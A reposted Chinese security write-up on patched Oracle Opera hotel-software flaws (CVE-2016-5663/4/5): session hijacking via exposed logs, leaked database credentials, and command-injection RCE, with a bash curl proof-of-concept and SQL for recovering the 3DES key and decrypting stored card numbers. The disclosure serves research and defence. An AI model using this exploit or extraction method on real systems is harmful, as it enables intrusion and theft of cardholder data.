oracle下session漏洞,Oracle的酒店管理平台RCE漏洞以及持卡人数据泄漏(CVE-2016-5663/4/5)...

本文主要是介绍oracle下session漏洞,Oracle的酒店管理平台RCE漏洞以及持卡人数据泄漏(CVE-2016-5663/4/5)...,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

简介

Oracle Opera(原Micros Opera)是一款用于酒店集团订单管理的主流软件。凯悦和希尔顿等酒店就使用该软件来管理订单以及处理付款流程。

5e3b68dcfd5c880c1fbb33aba3c04bc6.png

为了进行结算,应用程序会将加密后的PAN(信用卡号),到期日,持卡人姓名保留在Oracle SQL数据库中。我们发现了3种不同的方法获取数据库访问权限,一旦攻击者获得了访问权限,他们就可以提取和解密数据库中存储的持卡人数据。

d51020117a4db584ca59c63698106297.png

漏洞分析

CVE-2016-5665: Session Hijacking via Exposed Logs

0ef289373d603736a2ef2845dee0857f.png

用户登录到Opera后,可以选择要使用的交互接口,对于大多数用户来说会选择上图中圈出来的物业管理系统(PMS)接口。启动接口的请求包含了用户的会话令牌和要启动的特定接口的参数。

6d179740e13e4ff969342102ca2be4b0.png

会话令牌以及其他请求的参数都会记录到同一个目录,且不需要进行身份验证就可以通过Web服务器访问。

87f3055ec9d41e3ee987eb50f14bad93.png

攻击者现在只需要等待管理员用户登录,管理员一旦上线,攻击者就可以获得应用程序的完整权限。

管理员用户可以使用“Opera SQL”工具,该工具可以向数据库提交原始查询

0458587a80812c4b68a77084ad6595ba.png

使用这种方法提取持卡人数据的弊端就是速度太慢而且不够隐蔽,每次查询都会被记录到应用层。此外其使用的Oracle Forms用户界面还不如直接连接到数据库服务器来的高效。

CVE-2016-5664: Exposure of Oracle SQL Database Credentials

如果攻击者与数据库服务器在同一个网络上,另一种方法则是构造一个数据库连接字符串。打开通过身份验证的Oracle Forms,其响应的HTML中返回了数据库凭据和服务名称,数据库服务器主机名可在未经身份验证的servlet的响应中访问。

7a6608c9e4dca1ef5f24bef72d843f8d.png

至此,攻击者还需要使用简单的连接语句连接到sqlplus。如此就可以避开日志记录以及使用“Opera SQL”工具的低效率。sqlplus [Username]/[Password]@[Hostname]:[Port]/[Service Name]

75a460258ab22606a4c3ff9c857174ac.png

CVE-2016-5663: RCE via OS Command Injection and RFI

在攻击者只能访问应用程序服务器,或者数据库服务器的入站连接仅限于应用程序服务器的情况下,就体现出该远程代码执行漏洞就的优势了。这是我最中意的发现了,因为他把看似毫不相干的元素组合在一起来完成恶意目的。

诊断过程信息的servlet,将返回一个PID信息。

对于黑盒测试来说PID参数传入连接字符串以进行命令执行的这个过程不是很清晰。如下图所示,攻击者通过修改参数以执行另外一个命令,并将该输出内容发送到可以通过web服务器访问的另外一个文件。

e3dab3f93b87939aecc45e3bc066e1e4.png

预计如果没有出错,他应该会在Web根目录下的webtemp文件夹中返回whoami输出。然而我却得到的了一个错误消息,其指出某个文件丢失。

6db2eb1c41d573455e56f16b9f208683.png

查看servlet对应的代码,我们可以看到错误发生位置。构造的命令行包含来源于属性文件的pslist实用程序的路径。该文件被硬编码到D:\micros\opera\operaias\default.env。

但这个文件似乎不存在,这也是为何函数在执行pslist前失败的原因。

2c06386835caf69b38b2dd87a5ae1090.png

完成以下两点即可解决该servlet问题:

1.找到OPERA_HOME属性

2.将其保存到D:\micros\opera\operaias\default.env

巧合的是有一个经过诊断的servlet,暴露了opera_home属性。

9a3a3a13cb9c7936d0f1389dc6b354c4.png

而另一个诊断的servlet也合宜的暴露了RFI向量上传的目标路径:

528e661e79115d1def7fef75c1b31661.png

再次利用ProcessInfo servlet,可以看到输出正常。且whoami返回的结果我们得知该应用是以system权限运行的。

38f21a0a1c62268449ccaa8f27540ac1.png

以下POC可用于验证。#!/bin/bash

STDOUT="D:\micros\opera\operaias\webtemp\temp.log"

if [ "$#" -ne 2 ]; then

echo "Usage: $0 "

echo "E.g. : $0 http://opera.example.biz whoami"

exit 1

else

host="$1"

cmd="$2"

fi

# Activate exploit.

curl -s -XPOST --data-binary "OPERA_HOME=D:\micros\opera"

"$host/Operajserv/webarchive/FileReceiver?filename=D:/micros/opera/operaias/default.env&crc=26&append=false" >

/dev/null

# Inject command.

curl -s -G --data-urlencode "pid=1 & $cmd > \"$STDOUT\" 2" "$host/Operajserv/webarchive/ProcessInfo"

> /dev/null

curl -# -G "$host/webtemp/temp.log"

# Deactivate exploit.

curl -s -G --data-urlencode "pid=1 & del \"$STDOUT\" 2" "$host/Operajserv/webarchive/ProcessInfo" >

/dev/null

curl -s -G --data-urlencode 'pid=1 & del "D:\micros\opera\operaias\default.env" 2' "$host/Operajserv/

webarchive/ProcessInfo" > /dev/null

持卡人数据解密

结合上述漏洞组合,攻击者可以获得对数据库的认证访问。在数据库中,攻击者可以检索持卡人数据并进行解密。根据Opera knowledgebase,信用卡号和到期日期都以3DES加密格式存储在数据库表中。

对于攻击者而言,获取到3DES的加密密钥就是关键了。OPERA使用DBMS_OBFUSCATION_TOOLKIT程序包执行3DES加密,这个包没有用来存储密钥,其创建一个单独的程序包用来存储密钥以及处理加密函数调用。

PL/SQL的包装工具用来对代码进行混淆处理,且每次更改加密密钥后都会重新生成此程序包

用于检索包体的示例SQL查询如下:SELECT NAME, TYPE, TEXT from USER_SOURCE WHERE NAME LIKE '%IFC_CRYPT_V4_%'

由于包体仅仅只是进行了混淆处理,因此可以对其进行去混淆化或“解包”以显示3DES密钥。

8fb8093d1f0541d1d9fd258209d69d13.png

现在已知密钥和算法,对于攻击者来说接下来便是找到用于存储加密数据的表了。

该信息可以从OPERA knowledgebase中获得:

2783c0dc1292c7b55997a1d48e27f780.png

在NAME$_CREDIT_CARD表中执行一个select查询就可以得到用户姓名以及加密的信用卡信息,然后可以通过脚本将其解密为明文

6e3362ff9de163931611c9e1d7094dba.png

*参考来源:thuraisamy,FB小编鸢尾编译,转载请注明来自FreeBuf(FreeBuf.COM)

这篇关于oracle下session漏洞,Oracle的酒店管理平台RCE漏洞以及持卡人数据泄漏(CVE-2016-5663/4/5)...的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/333176

相关文章

SpringBoot分段处理List集合多线程批量插入数据方式

《SpringBoot分段处理List集合多线程批量插入数据方式》文章介绍如何处理大数据量List批量插入数据库的优化方案:通过拆分List并分配独立线程处理,结合Spring线程池与异步方法提升效率... 目录项目场景解决方案1.实体类2.Mapper3.spring容器注入线程池bejsan对象4.创建

PHP轻松处理千万行数据的方法详解

《PHP轻松处理千万行数据的方法详解》说到处理大数据集,PHP通常不是第一个想到的语言,但如果你曾经需要处理数百万行数据而不让服务器崩溃或内存耗尽,你就会知道PHP用对了工具有多强大,下面小编就... 目录问题的本质php 中的数据流处理:为什么必不可少生成器:内存高效的迭代方式流量控制:避免系统过载一次性

C#实现千万数据秒级导入的代码

《C#实现千万数据秒级导入的代码》在实际开发中excel导入很常见,现代社会中很容易遇到大数据处理业务,所以本文我就给大家分享一下千万数据秒级导入怎么实现,文中有详细的代码示例供大家参考,需要的朋友可... 目录前言一、数据存储二、处理逻辑优化前代码处理逻辑优化后的代码总结前言在实际开发中excel导入很

oracle 11g导入\导出(expdp impdp)之导入过程

《oracle11g导入导出(expdpimpdp)之导入过程》导出需使用SEC.DMP格式,无分号;建立expdir目录(E:/exp)并确保存在;导入在cmd下执行,需sys用户权限;若需修... 目录准备文件导入(impdp)1、建立directory2、导入语句 3、更改密码总结上一个环节,我们讲了

SpringBoot 多环境开发实战(从配置、管理与控制)

《SpringBoot多环境开发实战(从配置、管理与控制)》本文详解SpringBoot多环境配置,涵盖单文件YAML、多文件模式、MavenProfile分组及激活策略,通过优先级控制灵活切换环境... 目录一、多环境开发基础(单文件 YAML 版)(一)配置原理与优势(二)实操示例二、多环境开发多文件版

MyBatis-plus处理存储json数据过程

《MyBatis-plus处理存储json数据过程》文章介绍MyBatis-Plus3.4.21处理对象与集合的差异:对象可用内置Handler配合autoResultMap,集合需自定义处理器继承F... 目录1、如果是对象2、如果需要转换的是List集合总结对象和集合分两种情况处理,目前我用的MP的版本

修复已被利用的高危漏洞! macOS Sequoia 15.6.1发布

《修复已被利用的高危漏洞!macOSSequoia15.6.1发布》苹果公司于今日发布了macOSSequoia15.6.1更新,这是去年9月推出的macOSSequoia操作... MACOS Sequoia 15.6.1 正式发布!此次更新修复了一个已被黑客利用的严重安全漏洞,并解决了部分中文用户反馈的

GSON框架下将百度天气JSON数据转JavaBean

《GSON框架下将百度天气JSON数据转JavaBean》这篇文章主要为大家详细介绍了如何在GSON框架下实现将百度天气JSON数据转JavaBean,文中的示例代码讲解详细,感兴趣的小伙伴可以了解下... 目录前言一、百度天气jsON1、请求参数2、返回参数3、属性映射二、GSON属性映射实战1、类对象映

Redis实现高效内存管理的示例代码

《Redis实现高效内存管理的示例代码》Redis内存管理是其核心功能之一,为了高效地利用内存,Redis采用了多种技术和策略,如优化的数据结构、内存分配策略、内存回收、数据压缩等,下面就来详细的介绍... 目录1. 内存分配策略jemalloc 的使用2. 数据压缩和编码ziplist示例代码3. 优化的

C# LiteDB处理时间序列数据的高性能解决方案

《C#LiteDB处理时间序列数据的高性能解决方案》LiteDB作为.NET生态下的轻量级嵌入式NoSQL数据库,一直是时间序列处理的优选方案,本文将为大家大家简单介绍一下LiteDB处理时间序列数... 目录为什么选择LiteDB处理时间序列数据第一章:LiteDB时间序列数据模型设计1.1 核心设计原则